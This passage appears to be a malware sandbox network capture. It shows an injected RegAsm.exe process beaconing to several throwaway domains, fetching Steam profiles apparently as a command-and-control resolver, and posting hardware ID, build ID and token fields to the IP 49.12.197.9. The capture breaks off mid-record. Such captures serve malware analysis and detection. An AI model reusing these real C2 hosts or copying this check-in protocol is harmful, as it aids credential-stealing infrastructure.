2024-10-02 07:42:21 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AFIEGIECGCBKFIEBGCAACont
2024-10-02 07:42:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49810	104.21.18.193	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:22 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: snarlypagowo.site
2024-10-02 07:42:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:22 UTC	801	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4sl0o13mhmfgmlkru131k0e32f; expires=Sun, 26 Jan 2025 01:29:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LGRQxpPFE03OSNEhVx0IUMBxXxDJNBjj6tZ%2B4ZyHSaWoqDnsYzFu1l19ag%2BlOtsAodNEjsvIS5PI%2FP%2BGuBKHzY91j2vzTPjhQA2z4uY3EgQJD9qXXO3sdB2bQjMmSiwkC8v%2FbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e2e6d0e42fc-EWR
2024-10-02 07:42:22 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49812	172.67.195.67	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:23 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mysterisop.site
2024-10-02 07:42:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:23 UTC	772	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l0r6gtmap1ck34a4e41pnrnvfp; expires=Sun, 26 Jan 2025 01:29:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hY555qe5O79AZIPKu7YL6cwAQ0nTe2Apj1owW5zx6YLgpaZnSFR1JqEsm0xRTnp%2BYcLp7C0BpEidn%2Bp7OXg1LMlSl2j47ow0Lf9vy9J3%2FxNSY5OSNx3Gqj%2BMWeptzY5m%2FzI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e348f2d4392-EWR
2024-10-02 07:42:23 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49813	104.21.17.174	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:24 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: absorptioniw.site
2024-10-02 07:42:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:25 UTC	778	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b680rf55knsbkh38t1du1o9hhs; expires=Sun, 26 Jan 2025 01:29:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wv2WjoewoF%2FtpoFjJRDIvvS%2FjIEYuRDK%2FDdw20BeFrZhhx8%2Fr31Ur590Q9xONZB9QKG%2FVSX8TEOyjKDx2Fh6M7LqFMgjdQiOJKMGPchrWF5CNKlY7I8jcPYYujqmH92tEnTOrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e3cbc0c5e68-EWR
2024-10-02 07:42:25 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49814	104.102.49.254	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:25 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:25 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 07:42:25 GMT Content-Length: 34879 Connection: close Set-Cookie: sessionid=79fc0b78b8443f99977c5b4b; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 07:42:25 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 07:42:25 UTC	16384	IN	Data Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
2024-10-02 07:42:25 UTC	3768	IN	Data Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
2024-10-02 07:42:25 UTC	213	IN	Data Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49815	104.102.49.254	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:25 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-02 07:42:26 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 07:42:26 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=5f37343555ad782b4e26ccb0; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 07:42:26 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 07:42:26 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-02 07:42:26 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-02 07:42:26 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49816	49.12.197.9	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:26 UTC	184	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49817	104.21.16.12	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:26 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gravvitywio.store
2024-10-02 07:42:26 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:27 UTC	778	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s5lesen6ma6khq6fev5dkbq1m8; expires=Sun, 26 Jan 2025 01:29:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEtivyaWWAOI4PyXXi2X1f5n5xXDtxVd4bJMeaR7WaYFtxk1BOlNCE5UZNHFD67%2Bq9GihvC%2BT7xkConW7qSJh55gZU%2FW43qmioawj8G1G9%2BAbI6LNkClGXbmZpUgYe0%2FwTwEAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e4ab98b0f79-EWR
2024-10-02 07:42:27 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49818	49.12.197.9	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:27 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:27 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 39 44 34 38 46 41 44 42 36 44 33 33 39 32 32 35 39 37 34 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 2d 2d 0d Data Ascii: ------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="hwid"1A9D48FADB6D3392259749-a33c7340-61ca------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------KKKJEHCGCGDAAAKFHJKJ--
2024-10-02 07:42:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:28 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 31 32 62 36 30 62 63 32 64 62 36 61 35 37 63 62 38 66 37 65 31 32 36 35 36 39 37 61 31 34 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|f12b60bc2db6a57cb8f7e1265697a147\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49820	49.12.197.9	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:29 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 32 62 36 30 62 63 32 64 62 36 61 35 37 63 62 38 66 37 65 31 32 36 35 36 39 37 61 31 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 